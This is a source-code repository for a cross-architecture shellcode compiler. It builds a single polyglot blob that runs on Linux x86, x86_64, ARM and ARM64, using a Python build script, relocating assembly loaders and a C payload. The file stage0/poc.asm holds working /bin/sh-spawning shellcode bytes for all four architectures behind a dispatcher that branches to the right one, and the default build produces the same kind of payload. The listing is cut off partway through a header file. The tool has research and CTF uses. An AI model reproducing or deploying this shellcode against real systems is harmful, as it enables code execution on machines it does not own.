├── README.md ├── build.py ├── stage0 ├── README ├── init.asm └── poc.asm ├── stage1 ├── README ├── arm.s ├── arm_64.s ├── x86.s └── x86_64.s ├── stage2 ├── README ├── linuxdefs.h ├── main.c ├── snprintf.c ├── syscall_arm.c ├── syscall_arm.h ├── syscall_arm_64.c ├── syscall_arm_64.h ├── syscall_x86.c ├── syscall_x86.h ├── syscall_x86_64.c ├── syscall_x86_64.h ├── utils.c └── utils.h ├── tools ├── README ├── sc.c ├── sc_arm ├── sc_arm_64 ├── sc_x86 └── sc_x86_64 └── xarch_binsh /README.md: -------------------------------------------------------------------------------- 1 | # Cross Arch Shellcode Compiler 2 | 3 | 2016 - ixty 4 | 5 | ## Information 6 | This program builds portable, architecture-independent shellcode from C code. 7 | It currently supports the following architectures: 8 | - x86 9 | - x86_64 10 | - arm 11 | - arm_64 12 | 13 | It works by: 14 | - compiling the same C code for each architecture 15 | - linking it to an arch-specific syscall implementation 16 | - using a polyglot dispatching shellcode 17 | 18 | The final layout of the output binary is: 19 | [ DISPATCHER ] 20 | [ X86 BLOCK ] 21 | [ X86_64 BLOCK ] 22 | [ ARM BLOCK ] 23 | [ ARM_64 BLOCK ] 24 | 25 | The dispatcher is in stage0. 26 | Open [stage0/README](./stage0/README) for information on how it works 27 | 28 | Each arch-specific block has the following layout: 29 | 30 | [ LOADER ] 31 | [ RELOC NUM ] 32 | [ RELOC 0 ] 33 | [ RELOC 1 ] 34 | ... 35 | [ RELOC N ] 36 | [ START OFF ] 37 | [ CODE ] 38 | RELOC NUM, each RELOC and START OFF are one native word each (4 bytes for x86/arm, 8 bytes for x86_64/arm_64, little-endian) and every offset is relative to the start of CODE; the loader adds the runtime address of CODE to each listed word before jumping to CODE + START OFF. 39 | Open [stage1/README](./stage1/README) for information on loaders 40 | 41 | The final payload code is stage2. 
42 | Open [stage2/README](./stage2/README) for information on the payload 43 | 44 | 45 | ## Dependencies 46 | 47 | - python2.7 48 | - nasm 49 | - gcc 50 | - pyelftools (pip install pyelftools) 51 | - qemu-user-static 52 | - qemu-utils 53 | - arm chroot with gcc 54 | - arm64 chroot with gcc 55 | 56 | #### Assuming you use debian: 57 | 58 | ``` 59 | # apt-get install gcc nasm python2.7 python-pip 60 | # apt-get install qemu qemu-user-static qemu-utils binfmt-support debootstrap 61 | # qemu-debootstrap --arch=arm64 jessie /opt/arm64/ http://ftp.debian.org/debian 62 | # qemu-debootstrap --arch=armhf jessie /opt/armhf/ http://ftp.debian.org/debian 63 | 64 | # chroot /opt/arm64 65 | # apt-get install gcc 66 | # exit 67 | 68 | # chroot /opt/armhf 69 | # apt-get install gcc 70 | # exit 71 | ``` 72 | The chroot paths must match the `chroot` entries of the `archs` table in build.py (`/opt/armhf/` and `/opt/arm64/`). 73 | ## Running & testing 74 | 75 | `$ ./build.py` 76 | Run it as root: it `chroot`s into the ARM trees, copies the whole working directory to `<chroot>/tmp/cc` for the cross builds and deletes that copy when it finishes. 77 | If everything goes well, it creates ./output which is the portable multi-arch shellcode. The default stage2 payload spawns /bin/sh, so the blob is shellcode in every sense: keep it, and any test run of it, inside a disposable VM. 78 | 79 | To test that everything works, use the provided 'sc' utility, which executes the blob on the current architecture: 80 | ``` 81 | On the local x86_64 machine 82 | user@x86_64-box $ ./sc_x86 ./output 83 | user@x86_64-box $ ./sc_x86_64 ./output 84 | ... And in the chroots for arm/arm64 85 | user@armhf-chroot $ ./sc_arm ./output 86 | user@arm64-chroot $ ./sc_arm_64 ./output 87 | ``` 88 | 89 | ## Credits 90 | Thanks to feliam 91 | > https://github.com/feliam/mkShellcode 92 | 93 | > http://blog.binamuse.com/2013/01/about-shellcodes-in-c.html 94 | 95 | The x86 / x86_64 loader code is taken from this project and the shellcode extraction technique is based upon his work as well. 
96 | 97 | 98 | -------------------------------------------------------------------------------- /build.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | # 2016 - ixty 5 | # 6 | # this python program will build all stages of our code and manually 7 | # link everything together to produce a single binary blob 8 | # this blob can be ran on linux on either x86 x86_64 arm arm_64 9 | # the final payload is written in C in stage2 10 | 11 | import os, sys, struct, subprocess 12 | from elftools.elf.elffile import ELFFile 13 | 14 | # gcc compilation options that are common for all architectures 15 | # basically, we want an executable with no BS and relocation information 16 | common_opts = ' -nostdlib \ 17 | -fno-builtin \ 18 | -fno-common \ 19 | -fno-stack-protector \ 20 | -fomit-frame-pointer \ 21 | -fno-exceptions \ 22 | -fno-asynchronous-unwind-tables \ 23 | -fno-unwind-tables \ 24 | -s \ 25 | -pie \ 26 | -I./hdr ' 27 | 28 | # list of files compiled into our portable polyglot 29 | # src/syscall_(ARCH)_.c is automatically added to that list 30 | common_files = [ 31 | 'stage2/main.c', 32 | # 'stage2/snprintf.c', 33 | # 'stage2/utils.c', 34 | ] 35 | 36 | # supported architectures 37 | # with: 38 | # enabled/disabled 39 | # specific compilation flags 40 | # command to build loader 41 | # chroot to cross compile ( https://wiki.debian.org/Arm64Qemu ) 42 | # extra gcc options at the end of the cmd 43 | archs = { 44 | 'x86': { 45 | 'enabled': 1, 46 | 'opts': '-m32', 47 | 'as': [ 'as', '-32', '-o', 'stage1_bins/x86.o', 'stage1/x86.s' ], 48 | 'chroot': None, 49 | 'extra': '' 50 | }, 51 | 'x86_64': { 52 | 'enabled': 1, 53 | 'opts': '-mcmodel=large', 54 | 'as': [ 'as', '-64', '-o', 'stage1_bins/x86_64.o', 'stage1/x86_64.s' ], 55 | 'chroot': None, 56 | 'extra': '' 57 | }, 58 | 'arm': { 59 | 'enabled': 1, 60 | 'opts': '-mword-relocations', 61 | 'as': [ 'as', '-o', 'stage1_bins/arm.o', 
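'stage1/arm.s' ],
        'chroot': '/opt/armhf/',
        'extra': ' -lgcc'
    },
    'arm_64': {
        'enabled': 1,
        'opts': '-mcmodel=large',
        'as': [ 'as', '-o', 'stage1_bins/arm_64.o', 'stage1/arm_64.s' ],
        'chroot': '/opt/arm64/',
        'extra': ''
    }
}

# ELF relocation type whose target lives in r_addend instead of in the patched
# word: R_AARCH64_RELATIVE.  It is the only addend-carrying case handled here.
R_AARCH64_RELATIVE = 1027

# sections of the stage2 ELF that are kept in the blob (in ELF file order)
PAYLOAD_SECTIONS = [ '.text', '.data', '.bss', '.rodata' ]

# globals to store bytecode, elfs, data, ...
loaders = {}    # stage1: arch -> bytes of the assembled loader's .text
bins = {}       # stage2: arch -> [reloc num][reloc 0..N][start off][code]
payloads = {}   # stage1 + stage2 concatenated, per arch
todelete = []   # build trees created inside the chroots, removed at exit

# cleanup files
def make_clean():
    """Remove every build artefact: ./output and the three stage*_bins directories."""
    print('> cleaning up')
    os.system('rm -rf output stage0_bins stage1_bins stage2_bins')

# assemble loaders & get their bytecode
def make_loaders():
    """Assemble the stage1 loader of each enabled arch and store its .text in `loaders`.

    Native archs are assembled in place.  Archs with a 'chroot' entry get the
    whole working directory copied to <chroot>/tmp/cc and are assembled inside
    the chroot (this needs root); the copy is recorded in `todelete` so that
    main() can remove it.  Aborts via fail() on the first assembler error.
    """
    global todelete
    for a in sorted(archs.keys()):
        if not archs[a]['enabled']:
            continue
        if not archs[a]['chroot']:
            err, out = exec_cmd(archs[a]['as'])
            if err:
                print(out)
                fail('> [%-6s] error assembling loader' % a)
        else:
            path = archs[a]['chroot'] + '/tmp/cc/'
            # NOTE: everything in the working directory (previous build output
            # included) lands in the chroot.  The shell commands below are built
            # from the constant `archs` table only, never from user input.
            os.system('mkdir -p %s' % path)
            os.system('cp -r ./* %s' % path)
            todelete += [path]

            if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % ' '.join(archs[a]['as'])):
                fail('> [%-6s] error assembling loader' % a)
            os.system('cp %sstage1_bins/%s.o ./stage1_bins/' % (path, a))

        with open('stage1_bins/%s.o' % a, 'rb') as f:
            text = ELFFile(f).get_section_by_name('.text')
            if text is None:
                fail('> [%-6s] loader object has no .text section' % a)
            loaders[a] = text.data()
        print('> [%-6s] loader size %d bytes' % (a, len(loaders[a])))

# build elf payload
def make_elfs():
    """Compile stage2 (common_files + stage2/syscall_<arch>.c) into stage2_bins/<arch>.

    common_opts produces a stripped PIE with no libc and no unwind tables, so
    get_payload() only has to deal with .text/.data/.bss/.rodata and the
    relocation tables.  Chroot archs are built in the <chroot>/tmp/cc tree that
    make_loaders() already copied, and the ELF is copied back to ./stage2_bins.
    Aborts via fail() on compiler errors.
    """
    for a in sorted(archs.keys()):
        if not archs[a]['enabled']:
            continue

        gcc_cmd = 'gcc ' + common_opts + archs[a]['opts'] + ' -o stage2_bins/%s ' % a \
            + ' '.join(common_files) + ' stage2/syscall_%s.c' % a + archs[a]['extra']
        gcc_cmd = clean_spaces(gcc_cmd)
        print('> [%-6s] %s' % (a, gcc_cmd))

        if not archs[a]['chroot']:
            err, out = exec_cmd(gcc_cmd.split(' '))
            if err:
                print(out)
                fail('> [%-6s] error compiling elf' % a)
        else:
            path = archs[a]['chroot'] + '/tmp/cc/'
            # folder is already copied for loaders building
            if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % gcc_cmd):
                fail('> [%-6s] error compiling elf' % a)
            os.system('cp %sstage2_bins/%s ./stage2_bins/' % (path, a))

# for each arch, merge loader, relocs & code into a standalone arch specific 'payload'
def make_payloads():
    """Set payloads[a] = loaders[a] + bins[a] for every enabled arch and dump it to stage0_bins/<arch>."""
    for a in sorted(archs.keys()):
        if not archs[a]['enabled']:
            continue
        get_payload(a)
        payloads[a] = loaders[a] + bins[a]
        with open('stage0_bins/%s' % a, 'wb') as f:
            f.write(payloads[a])

# this function loads an ELF file,
# extracts code, data & relocs from it
# remaps sections (to prevent empty zero-pad spaces)
# concatenates relocation offsets, start address & elf code/data
def get_payload(a):
    """Flatten the stage2 ELF of arch `a` into bins[a].

    Output layout (every word is the ELF's native width, little-endian):
        [num relocs] [reloc 0] ... [reloc N-1] [entry offset] [section bytes...]
    Only PAYLOAD_SECTIONS are kept.  They are packed back to back ("remapped")
    so the blob carries no zero padding, and every relocated word plus the entry
    point is rewritten from its link-time address to its offset inside the
    packed image; the stage1 loader later adds the runtime base to each listed
    word.  Aborts via fail() when a relocation or the entry point refers to an
    address outside the kept sections.
    """
    print('> [%-6s] loading elf file' % a)
    secs = []
    relocs = []
    vaddr_remap = 0
    bytebuf = ''

    with open('stage2_bins/%s' % a, 'rb') as f:
        elf = ELFFile(f)
        cls = elf.elfclass

        # parse elf sections
        for s in elf.iter_sections():
            if s.name in PAYLOAD_SECTIONS:
                if s.header.sh_type == 'SHT_NOBITS':
                    # .bss has no file bytes: reserve its full sh_size as zeros
                    # so addresses remapped into it stay valid and C globals
                    # start zeroed.  (Depending on the pyelftools version,
                    # data() returns either b'' or unrelated file bytes here.)
                    data = '\x00' * s.header.sh_size
                else:
                    data = s.data()
                secs += [{
                    'addr': s.header.sh_addr,
                    'name': s.name,
                    'data': data,
                    'size': len(data),
                    'remap': vaddr_remap
                }]
                # next section is packed right after this one
                vaddr_remap += len(data)

            # get relocation info
            if 'iter_relocations' in dir(s):
                for r in s.iter_relocations():
                    # arm 64 keeps the target in the addend, not in the patched word
                    if r['r_info_type'] == R_AARCH64_RELATIVE:
                        relocs += [ (r['r_offset'], r['r_addend']) ]
                    else:
                        relocs += [ (r['r_offset'], 0) ]

        entry = elf.header.e_entry

    # list selected sections
    for s in secs:
        print(' [%-8s] addr 0x%x size 0x%x remapping to 0x%x' % (s['name'], s['addr'], s['size'], s['remap']))

    # patch relocs to our new mapping & add relocs to bytebuf
    bytebuf += pack_word(cls, len(relocs))
    for (r, addend) in relocs:
        if get_section(secs, r) is None:
            fail('> [%-6s] reloc @ 0x%x lies outside the packed sections' % (a, r))
        addr = get_word(secs, r, cls)       # address pointed to by reloc
        if not addr and addend:             # only happens in arm_64 for now
            addr = addend
        if get_section(secs, addr) is None:
            fail('> [%-6s] reloc @ 0x%x points to 0x%x, outside the packed sections' % (a, r, addr))
        naddr = remap_addr(secs, addr)      # new address after our remapping
        rr = remap_addr(secs, r)            # new reloc address after our remapping
        put_word(secs, r, cls, naddr)
        bytebuf += pack_word(cls, rr)

    # add entry point
    if get_section(secs, entry) is None:
        fail('> [%-6s] entry point 0x%x lies outside the packed sections' % (a, entry))
    print(' > entry point 0x%x (0x%x)' % (entry, remap_addr(secs, entry)))
    bytebuf += pack_word(cls, remap_addr(secs, entry))

    # add sections data
    for s in secs:
        bytebuf += s['data']

    bins[a] = bytebuf

# make the final binary with the differents archs payloads
def make_final():
    """Splice every arch payload into the stage0 dispatcher and assemble ./output.

    stage0/init.asm holds one `__payload_<arch>__` placeholder per arch.  Each
    is replaced by a nasm `db` list of the payload bytes (by nothing for a
    disabled arch); the result is written to stage0_bins/final.asm, assembled
    with nasm and copied to ./output.  Aborts via fail() on assembler errors.
    """
    with open('stage0/init.asm', 'rb') as f:
        asm = f.read()

    for a in sorted(archs.keys()):
        if archs[a]['enabled']:
            buf = 'db ' + ', '.join('0x%.2x' % ord(c) for c in payloads[a])
        else:
            buf = ''
        asm = asm.replace('__payload_%s__' % a, buf)

    with open('stage0_bins/final.asm', 'wb') as f:
        f.write(asm)

    print('> assembling final binary')
    err, out = exec_cmd(['nasm', '-o', 'stage0_bins/final', 'stage0_bins/final.asm'])
    if err:
        print(out)
        fail('> error assembling final binary')

    os.system('cp stage0_bins/final ./output')
    print('> saving final binary to ./output')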
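    print('> test with:')
    print(' ./tools/sc_x86 ./output')
    print(' ./tools/sc_x86_64 ./output')
    print(' ./tools/sc_arm ./output')
    print(' ./tools/sc_arm_64 ./output')

# get word size & int packing format based on arch class
def arch_fmt(cls):
    """Return (word size in bytes, struct format) for an ELF class of 32 or 64.

    Words are little-endian on all four supported targets; any other class
    aborts the build with exit status 1.
    NOTE(review): the two format strings were lost from this listing (text
    between '<' and '>' was stripped).  '<I' / '<Q' are a reconstruction; the
    original's signedness is unknown, verify against the upstream file.
    """
    if cls == 32:
        return (4, '<I')
    if cls == 64:
        return (8, '<Q')
    print('> unknown elf class')
    sys.exit(1)

# find a section that contains specified vaddr
def get_section(secs, addr):
    """Return the entry of `secs` whose [addr, addr + size) range holds `addr`, else None."""
    for s in secs:
        if s['addr'] <= addr < s['addr'] + s['size']:
            return s
    return None

# read word from section at specified vaddr
def get_word(secs, addr, cls):
    """Read the little-endian word stored at vaddr `addr`.

    Aborts via fail() when `addr` is not inside a packed section or the word
    would run past the end of its section (instead of crashing on None).
    """
    size, fmt = arch_fmt(cls)
    b = get_bytes(secs, addr, size)
    if b is None or len(b) != size:
        fail('> cannot read %d bytes at 0x%x: address not inside a packed section' % (size, addr))
    return struct.unpack(fmt, b)[0]

# write word from section at specified vaddr
def put_word(secs, addr, cls, word):
    """Overwrite the word at vaddr `addr` inside its section's data buffer.

    The section's 'data' string is replaced (strings are immutable), so callers
    must keep reading through `secs`.  Aborts via fail() when `addr` is unmapped.
    """
    size, fmt = arch_fmt(cls)
    s = get_section(secs, addr)
    if s is None:
        fail('> cannot write at 0x%x: address not inside a packed section' % addr)
    off = addr - s['addr']
    s['data'] = s['data'][:off] + struct.pack(fmt, word) + s['data'][off + size:]

# pack an int for specific arch
def pack_word(cls, word):
    """Serialize `word` as one native-width little-endian word for ELF class `cls`."""
    size, fmt = arch_fmt(cls)
    return struct.pack(fmt, word)

# get bytes from vaddr
def get_bytes(secs, addr, size):
    """Return `size` bytes starting at vaddr `addr`, or None if no section holds `addr`.

    The slice never crosses a section boundary, so a read that starts near the
    end of a section comes back short; get_word() checks the length.
    """
    s = get_section(secs, addr)
    if s is None:
        return None
    off = addr - s['addr']
    return s['data'][off : off + size]

# calculate the new vaddr after our section packing
def remap_addr(secs, addr):
    """Translate link-time vaddr `addr` into its offset in the packed image.

    Aborts via fail() when `addr` falls outside every packed section.
    """
    s = get_section(secs, addr)
    if s is None:
        fail('> cannot remap 0x%x: address not inside a packed section' % addr)
    return addr + s['remap'] - s['addr']

# abort
def fail(msg):
    """Print `msg` and abort the build with exit status -1 (255 to the shell)."""
    print(msg)
    sys.exit(-1)

# utility to launch a cmd & get its output
def exec_cmd(cmd, env=None, cwd=None):
    """Run `cmd` (an argv list, no shell) and return (returncode, stdout + stderr).

    NOTE(review): waiting before draining the pipes can deadlock if the child
    writes more than a pipe buffer; Popen.communicate() would avoid that.
    Any exception while launching is turned into (-1, '') by the except below.
    """
    try:
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, env=env)
        p.wait()
        return (p.returncode, p.stdout.read() + 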
p.stderr.read()) 303 | except: 304 | return (-1, '') 305 | 306 | # utility to launch a cmd in a chroot 307 | def exec_chroot(chroot, cmd, input=None): 308 | if input is not None: 309 | if subprocess.call('echo "%s" | chroot %s /bin/sh -c \'%s\'' % (input, chroot, cmd), shell=True): 310 | return -1 311 | return 0 312 | else: 313 | if subprocess.call('chroot %s /bin/sh -c \'%s\'' % (chroot, cmd), shell=True): 314 | return -1 315 | return 0 316 | 317 | # remove extra spaces 318 | def clean_spaces(s): 319 | while s.find(' ') >= 0: 320 | s = s.replace(' ', ' ') 321 | return s 322 | 323 | # main 324 | if __name__ == '__main__': 325 | arg = '' if len(sys.argv) == 1 else sys.argv[1] 326 | 327 | if arg == 'clean': 328 | make_clean() 329 | else: 330 | os.system('mkdir -p stage0_bins') 331 | os.system('mkdir -p stage1_bins') 332 | os.system('mkdir -p stage2_bins') 333 | make_loaders() 334 | make_elfs() 335 | make_payloads() 336 | make_final() 337 | # delete temp files in chroots 338 | os.system('rm -rf %s' % ' '.join(todelete)) 339 | 340 | -------------------------------------------------------------------------------- /stage0/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | stage0 contains a shellcode that can be successfully executed by the following architectures: 4 | - x86 5 | - x86_64 6 | - arm (little endian) 7 | - arm_64 (aarch64) (little endian) 8 | 9 | To make it work we need: 10 | - 4 bytes that translate to: 11 | - valid opcodes for arm, arm64 and x86 12 | - that evaluate to a jump in x86 13 | - that are functional nops in both arms (aka no load / store & no touching of PC / LR / stack) 14 | - 4 more bytes that translate to: 15 | - valid opcodes for arm and arm64 16 | - evaluate to a jump in arm 17 | - functionnal nop for arm64 18 | 19 | For the x86 / arm branching we use the following: 20 | 0xEB 0xXX 0x00 0x32 (with XX being the offset to x86 code) 21 | arm andlo r0, r0, #0xeb000 22 | arm64 orr w11, 
w23, #7 23 | x86 jmp $+0xa / junk 24 | x86_64 jmp $+0xa / junk 25 | 26 | For the arm / arm64 branching we use: 27 | 0xXX 0xXX 0xXX 0xEA 28 | arm b XXX 29 | arm64 ands x1, x0, x0 30 | 31 | (exact decoded instructions will change based on the offset values) 32 | 33 | We differenciate between x86 32 and 64 bits by using the REX + NOP / INC trick. 34 | After that we just jump to arch specific payloads. 35 | 36 | You can use the poc.asm to get a /bin/sh shellcode compatible with all those archs (it contains nulls thought) 37 | -------------------------------------------------------------------------------- /stage0/init.asm: -------------------------------------------------------------------------------- 1 | ; 2016 - ixty 2 | ; multi-arch linux /bin/sh shellcode 3 | ; works on: 4 | ; x86 5 | ; x86_64 6 | ; arm 7 | ; arm_64 8 | ; tested on debian jessie 9 | 10 | ; compile with nasm 11 | bits 32 12 | _start: 13 | 14 | ; ======================================================================= ; 15 | ; init, polyglot shellcode for arm, arm64, x86, x86_64 16 | ; branches out to specific arch dependent payloads 17 | ; ======================================================================= ; 18 | 19 | ; arm andlo r0, r0, #0xeb000 20 | ; arm64 orr w11, w23, #7 21 | ; x86 jmp $+0xa / junk 22 | ; x86_64 jmp $+0xa / junk 23 | db 0xeb, (_x86 - $ - 2), 0x00, 0x32 24 | ; arm b _arm ($+0x10) 25 | ; arm64 ands x1, x0, x0 26 | db ((_arm - $ - 8) / 4) % 0x100, ((_arm - $ - 8) / 4) / 0x100, 0x00, 0xea 27 | ; arm64 b _arm64 ($+0x14) 28 | db ((_arm64 - $) / 4) % 0x100, ((_arm64 - $) / 4) / 0x100, 0x00, 0x14 29 | 30 | 31 | ; ======================================================================= ; 32 | ; x86 only, detect 32/64 bits 33 | ; ======================================================================= ; 34 | _x86: 35 | ; x86 xor eax, eax; 36 | ; x86_64 xor eax, eax; 37 | xor eax, eax 38 | ; x86 inc eax 39 | ; x86_64 REX + nop 40 | db 0x40 41 | nop 42 | jz _x86_64 43 | 44 | 45 | ; 
======================================================================= ; 46 | ; PAYLOADs 47 | ; ======================================================================= ; 48 | _x86_32: 49 | __payload_x86__ 50 | 51 | _x86_64: 52 | __payload_x86_64__ 53 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 54 | _arm: 55 | __payload_arm__ 56 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 57 | _arm64: 58 | __payload_arm_64__ 59 | -------------------------------------------------------------------------------- /stage0/poc.asm: -------------------------------------------------------------------------------- 1 | ; 2016 - ixty 2 | ; multi-arch linux /bin/sh shellcode 3 | ; works on: 4 | ; x86 5 | ; x86_64 6 | ; arm 7 | ; arm_64 8 | ; tested on debian jessie 9 | 10 | ; compile with nasm 11 | bits 32 12 | _start: 13 | 14 | ; ======================================================================= ; 15 | ; init, polyglot shellcode for arm, arm64, x86, x86_64 16 | ; branches out to specific arch dependent payloads 17 | ; ======================================================================= ; 18 | 19 | ; arm andlo r0, r0, #0xeb000 20 | ; arm64 orr w11, w23, #7 21 | ; x86 jmp $+0xa / junk 22 | ; x86_64 jmp $+0xa / junk 23 | db 0xeb, (_x86 - $ - 2), 0x00, 0x32 24 | ; arm b _arm ($+0x10) 25 | ; arm64 ands x1, x0, x0 26 | db ((_arm - $ - 8) / 4), 0x00, 0x00, 0xea 27 | ; arm64 b _arm64 ($+0x14) 28 | db ((_arm64 - $) / 4), 0x00, 0x00, 0x14 29 | 30 | 31 | ; ======================================================================= ; 32 | ; x86 only, detect 32/64 bits 33 | ; ======================================================================= ; 34 | _x86: 35 | ; x86 xor eax, eax; 36 | ; x86_64 xor eax, eax; 37 | xor eax, eax 38 | ; x86 inc eax 39 | ; x86_64 REX + nop 40 | db 0x40 41 | nop 42 | jz _x86_64 43 | 44 | 45 | ; ======================================================================= ; 46 | ; PAYLOADs 47 | ; 
======================================================================= ; 48 | _x86_32: 49 | ; /bin/sh shellcode 50 | db 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 51 | 52 | _x86_64: 53 | ; /bin/sh shellcode 54 | db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05 55 | 56 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 57 | _arm: 58 | ; /bin/sh shellcode 59 | db 0x01, 0x30, 0x8f, 0xe2, 0x13, 0xff, 0x2f, 0xe1, 0x78, 0x46, 0x08, 0x30, 0x49, 0x1a, 0x92, 0x1a, 0x0b, 0x27, 0x01, 0xdf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 60 | 61 | times (4 - (($ - _start) % 4)) nop ; must be 4b aligned 62 | _arm64: 63 | ; /bin/sh shellcode 64 | db 0x00, 0x00, 0x00, 0x90, 0xa0, 0x00, 0x00, 0x10, 0x02, 0x00, 0x80, 0xd2, 0x01, 0x00, 0x80, 0xd2, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 65 | -------------------------------------------------------------------------------- /stage1/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | stage1 contains arch specific assembler code that act as 'loaders' 4 | Each loader is pretty simple, it consists of a few instructions that: 5 | - get current PC 6 | - read & patch relocation information in the binary code that follows the loader 7 | - jump to code 'entry point' 8 | 9 | Those loaders assume that the memory layout is the following: 10 | 11 | [loader code] [num relocs] [reloc1] [reloc2] ... [relocN] [start addr offset] [code] 12 | 13 | The loader assumes that the code is zero-mapped which is to say that the first instruction thinks its own address is 0 14 | The script build.py remaps the original section addresses to reflect that. 
15 | -------------------------------------------------------------------------------- /stage1/arm.s: -------------------------------------------------------------------------------- 1 | # ARM Loader 2 | 3 | # getpc 4 | .section .text 5 | 6 | # ptr to reloc num into r0 7 | adrl r0, relocs 8 | # number of relocs into r1 9 | ldr r1, [r0] 10 | 11 | # begining of relocs in r2 12 | add r2, r0, #4 13 | 14 | # start addr in r3 15 | mov r5, #4 16 | mul r4, r1, r5 17 | add r4, r2, r4 18 | ldr r3, [r4] 19 | 20 | # begining of code in r4 21 | add r4, r4, #4 22 | 23 | # fix relocs loop 24 | loop: 25 | cmp r1, #0 26 | beq done 27 | 28 | # reloc addr in r0 29 | ldr r0, [r2] 30 | # reloc data ptr in r0 31 | add r0, r4, r0 32 | # data in r5 33 | ldr r5, [r0] 34 | # remap reloc 35 | add r5, r4, r5 36 | # store remapped reloc data 37 | str r5, [r0] 38 | 39 | # decrement number of relocs to process 40 | sub r1, r1, #1 41 | # go to next reloc 42 | add r2, r2, #4 43 | b loop 44 | 45 | done: 46 | add r4, r3, r4 47 | bx r4 48 | .align 4 49 | 50 | relocs: 51 | -------------------------------------------------------------------------------- /stage1/arm_64.s: -------------------------------------------------------------------------------- 1 | # ARM64 Loader 2 | 3 | # getpc 4 | .section .text 5 | 6 | # ptr to reloc num into x0 7 | adr x0, relocs 8 | # number of relocs into x1 9 | ldr x1, [x0] 10 | 11 | # begining of relocs in x2 12 | add x2, x0, #8 13 | 14 | # start addr in x3 15 | mov x5, #8 16 | mul x4, x1, x5 17 | add x4, x2, x4 18 | ldr x3, [x4] 19 | 20 | # begining of code in x4 21 | add x4, x4, #8 22 | 23 | # fix relocs loop 24 | loop: 25 | cmp x1, #0 26 | beq done 27 | 28 | # reloc addr in x0 29 | ldr x0, [x2] 30 | # reloc data ptr in x0 31 | add x0, x4, x0 32 | # data in x5 33 | ldr x5, [x0] 34 | # remap reloc 35 | add x5, x4, x5 36 | # store remapped reloc data 37 | str x5, [x0] 38 | 39 | # decrement number of relocs to process 40 | sub x1, x1, #1 41 | # go to next reloc 42 | add x2, 
x2, #8 43 | b loop 44 | 45 | done: 46 | add x4, x3, x4 47 | br x4 48 | .align 4 49 | 50 | relocs: 51 | -------------------------------------------------------------------------------- /stage1/x86.s: -------------------------------------------------------------------------------- 1 | # x86 Loader 2 | 3 | # getpc 4 | .section .text 5 | jmp getpc1 6 | getpc2: 7 | jmp begin 8 | getpc1: 9 | call getpc2 10 | 11 | # loader code 12 | begin: 13 | popl %esi 14 | subl $(begin-relocs), %esi 15 | 16 | # esi now relocs 17 | movl (%esi), %ecx # get num relocs 18 | leal 8(%esi,%ecx,4), %edi # start of code 19 | andl %ecx, %ecx 20 | jz done 21 | 22 | # fix relocs loop 23 | fix_reloc: 24 | movl (%esi,%ecx,4), %eax 25 | addl %edi, (%edi,%eax,1) 26 | dec %ecx 27 | jne fix_reloc 28 | 29 | # start shellcode now 30 | done: 31 | addl -4(%edi), %edi 32 | jmp *%edi 33 | 34 | .align 4 35 | 36 | relocs: 37 | # [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB] 38 | -------------------------------------------------------------------------------- /stage1/x86_64.s: -------------------------------------------------------------------------------- 1 | # x86_64 Loader 2 | 3 | # getpc 4 | .section .text 5 | jmp getpc1 6 | getpc2: 7 | jmp begin 8 | getpc1: 9 | call getpc2 10 | 11 | # loader code 12 | begin: 13 | popq %rsi 14 | subq $(begin-relocs), %rsi 15 | 16 | # esi now relocs 17 | movq (%rsi), %rcx # get num relocs 18 | leaq 16(%rsi,%rcx,8), %rdi # start of code 19 | andq %rcx, %rcx 20 | jz done 21 | 22 | # fix relocs loop 23 | fix_reloc: 24 | movq (%rsi,%rcx,8), %rax 25 | addq %rdi, (%rdi,%rax,1) 26 | dec %rcx 27 | jne fix_reloc 28 | 29 | # start shellcode now 30 | done: 31 | addq -8(%rdi), %rdi 32 | jmpq *%rdi 33 | 34 | .align 8 35 | 36 | relocs: 37 | # [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB] 38 | -------------------------------------------------------------------------------- /stage2/README: -------------------------------------------------------------------------------- 1 | 2016 
- ixty 2 | 3 | stage2 is the final payload code. 4 | It is written in C once and will be compiled for all supported architectures. 5 | 6 | The architecture specific code is in the syscall_*.c/h files that implement linux syscalls. 7 | 8 | Dont forget to edit build.py if you add more c files to be compiled. 9 | 10 | 11 | -------------------------------------------------------------------------------- /stage2/linuxdefs.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYMB_LINUX_DEFS_H 2 | #define _SYMB_LINUX_DEFS_H 3 | 4 | #include 5 | #include 6 | 7 | #define ssize_t long 8 | #define size_t unsigned long 9 | 10 | #define O_RDONLY 00 11 | #define O_WRONLY 01 12 | #define O_RDWR 02 13 | #define O_CREAT 0100 14 | #define O_TRUNC 01000 15 | #define O_APPEND 02000 16 | 17 | 18 | #define F_DUPFD 0 19 | #define F_GETFD 1 20 | #define F_SETFD 2 21 | #define F_GETFL 3 22 | #define F_SETFL 4 23 | 24 | 25 | #define SEEK_SET 0 26 | #define SEEK_CUR 1 27 | #define SEEK_END 2 28 | 29 | 30 | #define PROT_READ 0x1 31 | #define PROT_WRITE 0x2 32 | #define PROT_EXEC 0x4 33 | #define PROT_NONE 0x0 34 | #define MAP_SHARED 0x01 35 | #define MAP_PRIVATE 0x02 36 | #define MAP_TYPE 0x0f 37 | #define MAP_FIXED 0x10 38 | #define 